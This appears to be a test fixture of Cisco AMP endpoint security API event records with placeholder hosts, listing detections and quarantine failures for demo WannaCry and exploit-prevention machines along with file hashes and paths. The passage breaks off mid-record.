+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533671595485954000,"timestamp":1610623725,"timestamp_nanoseconds":899000000,"date":"2021-01-14T11:28:45+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.FCE5B6784D-100.SBX.TG","detection_id":"6533671595485954049","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"pp32.exe","file_path":"\\\\?\\C:\\pp32.exe","identity":{"sha256":"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79","sha1":"bdb11107a33eaeded6a838eb2a0e6167637dbe9c","md5":"5df0c4ebca109779dc8afc745d612637"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":453000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179222052372000,"timestamp":1610623598,"timestamp_nanoseconds":437000000,"date":"2021-01-14T11:26:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179222052372503","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":875000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":860000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":610000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat 